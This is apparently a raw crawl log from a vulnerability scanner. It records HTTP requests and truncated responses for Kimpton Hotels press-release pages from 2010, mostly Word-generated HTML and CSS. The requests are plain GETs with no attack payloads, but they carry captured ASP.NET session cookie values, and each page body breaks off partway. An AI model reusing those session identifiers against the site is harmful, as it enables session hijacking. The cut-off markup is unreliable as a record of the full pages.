mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;}
p.CharChar1CharChar, li.CharChar1CharChar, div.CharChar1CharChar
{mso-style-name:" Char Char1 Char Char";
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:0in;
text-align:justify;
line-height:12.0pt;
mso-line-height-rule:exactly;
mso-pagination:none;
mso-layout-grid-align:none;
font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:"Times New Roman";
mso-bidi-font-family:Arial;
mso-ansi-language:DE-CH;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:700908021;
mso-list-type:hybrid;
mso-list-template-ids:1744995092 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l0:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l1
{mso-list-id:762846213;
mso-list-type:hybrid;
mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2
{mso-list-id:1241058028;
mso-list-type:hybrid;
mso-list-template-ids:1236678956 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:1319529687;
mso-list-type:hybrid;
mso-list-template-ids:2038327704 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0FC;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4
{mso-list-id:1597444569;
mso-list-type:hybrid;
mso-list-template-ids:-1248318078 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l5
{mso-list-id:1836218086;
mso-list-type:hybrid;
mso-list-template-ids:1327258538 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l6
{mso-list-id:1851023485;
mso-list-type:hybrid;
mso-list-template-ids:-1010268010 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l7
{mso-list-id:2057967201;
mso-list-type:hybrid;
mso-list-template-ids:-2130538154 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l7:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l8
{mso-list-id:2140606293;
mso-list-type:hybrid;
mso-list-template-ids:-893243000 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l8:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="2050"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>

<body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'>

<div class=Section1>

<p class=MsoNormal><span style='font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype
id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="_..
- /pdfs/press/html/Santa-Paws-1209/index.html

/pdfs/press/html/Santa-Paws-1209/index.html

http://www.kimptonhotels.com/pdfs/press/html/Santa-Paws-1209/index.html

Request

GET /pdfs/press/html/Santa-Paws-1209/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26768
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2009-11-19T19:26:00Z</o:LastPrinted> <o:Created>2009-12-09T21:15:00Z</o:Created> <o:LastSaved>2009-12-09T21:15:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>623</o:Words> <o:Characters>3554</o:Characters> <o:Lines>29</o:Lines> <o:Paragraphs>7</o:Paragraphs> <o:CharactersWithSpaces>4364</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:854463416; mso-list-type:hybrid; mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l2 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l2:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l4 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:1929657465; mso-list-type:hybrid; mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]></span></p><p class=MsoNormal><span style='font-size:8.0pt'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>ChloeMata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><b><o:p></o:p></b></span></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KimptonHotels &amp; Restaurants<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>StaceyEllis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:ital..
- /pdfs/press/html/KIT-1009/

/pdfs/press/html/KIT-1009/

http://www.kimptonhotels.com/pdfs/press/html/KIT-1009/

Request

GET /pdfs/press/html/KIT-1009/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/KIT-1009/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 38320
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><link rel=OLE-Object-Data href="images/oledata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>6</o:TotalTime> <o:LastPrinted>2009-10-05T18:51:00Z</o:LastPrinted> <o:Created>2009-10-20T21:52:00Z</o:Created> <o:LastSaved>2009-10-20T21:52:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>784</o:Words> <o:Characters>4470</o:Characters> <o:Lines>37</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5489</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 